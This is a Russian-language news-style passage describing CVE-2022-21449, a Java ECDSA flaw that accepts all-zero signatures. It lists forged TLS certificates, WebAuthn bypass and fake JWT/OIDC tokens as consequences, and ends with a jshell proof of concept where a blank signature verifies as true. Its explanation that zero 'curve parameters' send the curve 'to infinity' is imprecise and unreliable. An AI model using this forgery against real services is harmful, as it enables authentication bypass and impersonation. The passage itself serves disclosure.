Одна из проблем (CVE-2022-21449) позволяет сгенерировать фиктивную цифровую подпись ECDSA, используя при её генерации нулевые параметры кривой (если параметры нулевые, то кривая уходит в бесконечность, поэтому нулевые значения явно запрещены в спецификации). В библиотеках Java отсутствовала проверка на нулевые значения параметров ECDSA, поэтому при обработке подписей с нулевыми параметрами, Java во всех случаях считал их валидными).

В том числе уязвимость может использоваться для генерации фиктивных TLS-сертификатов, которые будут приниматься в Java как корректные, а также для обхода аутентификации через WebAuthn и формирования фиктивных подписей JWT и токенов OIDC. Иными словами, уязвимость позволяет генерировать универсальные сертификаты и подписи, которые будет приниматься и восприниматься как корректные в Java-обработчиках, использующих для проверки штатные классы java.security.*. Проблема проявляется в ветках Java 15, 16, 17 и 18. Доступен пример генерации поддельных сертификатов. jshell> import java.security.* jshell> var keys = KeyPairGenerator.getInstance(«EC»).generateKeyPair() keys ==> [email protected] jshell> var blankSignature = new byte[64] blankSignature ==> byte[64] { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, … , 0, 0, 0, 0, 0, 0, 0, 0 } jshell> var sig = Signature.getInstance(«SHA256WithECDSAInP1363Format») sig ==> Signature object: SHA256WithECDSAInP1363Format<not initialized> jshell> sig.initVerify(keys.getPublic()) jshell> sig.update(«Hello, World».getBytes()) jshell> sig.verify(blankSignature) $8 ==> true